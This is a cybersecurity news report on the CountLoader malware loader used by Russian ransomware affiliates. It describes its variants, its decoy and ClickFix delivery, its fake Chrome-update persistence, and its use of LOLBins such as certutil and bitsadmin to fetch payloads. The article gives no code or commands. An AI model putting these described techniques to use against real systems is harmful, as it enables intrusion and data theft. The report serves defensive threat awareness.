Cybersecurity researchers have identified a new malware loader, dubbed CountLoader, actively utilized by Russian ransomware groups to deploy post-exploitation tools such as Cobalt Strike, AdaptixC2, and the remote access trojan PureHVNC RAT. According to Silent Push, CountLoader is employed either as part of an Initial Access Broker’s (IAB) toolkit or by ransomware affiliates linked to the LockBit, Black Basta, and Qilin ransomware groups.
Multiple Versions and Delivery Methods
CountLoader manifests in three distinct versions: .NET, PowerShell, and JavaScript. Notably, the PowerShell variant was previously identified by Kaspersky, being distributed through DeepSeek-related decoys to deceive users into installation. These campaigns have led to the deployment of an implant named BrowserVenom, which reconfigures all browsing instances to route traffic through a proxy controlled by the attackers, enabling data manipulation and collection.
JavaScript Variant: Advanced Capabilities
The JavaScript version of CountLoader is particularly sophisticated, offering six methods for file downloading and three for executing various malware binaries. It includes a predefined function to identify a victim’s device based on Windows domain information. Additionally, it can gather system information, establish persistence by creating a scheduled task that mimics a Google Chrome update, and connect to a remote server for further instructions. This includes downloading and executing DLL and MSI installer payloads using rundll32.exe and msiexec.exe, transmitting system metadata, and deleting the created scheduled task. The six methods used to download files involve the use of curl, PowerShell, MSXML2.XMLHTTP, WinHTTP.WinHttpRequest.5.1, bitsadmin, and certutil.exe.
Use of Living-Off-the-Land Binaries (LOLBins)
CountLoader’s developers demonstrate an advanced understanding of the Windows operating system and malware development by utilizing Living-Off-the-Land Binaries (LOLBins) like ‘certutil’ and ‘bitsadmin.’ They also implement an on-the-fly command encryption PowerShell generator, enhancing the malware’s stealth and effectiveness.
Infrastructure and Deployment
The malware operates through an infrastructure comprising over 20 unique domains, serving as a conduit for Cobalt Strike, AdaptixC2, and PureHVNC RAT. PureHVNC RAT, a commercial offering from a threat actor known as PureCoder, is a predecessor to PureRAT, also referred to as ResolverRAT.
Social Engineering Tactics
Recent campaigns distributing PureHVNC RAT have employed the ClickFix social engineering tactic, luring victims through fake job offers. The trojan is deployed via a Rust-based loader, allowing attackers to execute malicious PowerShell code through the ClickFix phishing technique. PureCoder utilizes a revolving set of GitHub accounts to host files supporting the functionality of PureRAT.
Interconnected Russian Ransomware Landscape
The DomainTools Investigations team has uncovered the interconnected nature of the Russian ransomware landscape, identifying threat actor movements across groups and the use of tools like AnyDesk and Quick Assist, suggesting operational overlaps. Operators adapt to market conditions, reorganize in response to takedowns, and trust relationships are critical. These individuals choose to work with people they know, regardless of the name of the organization.
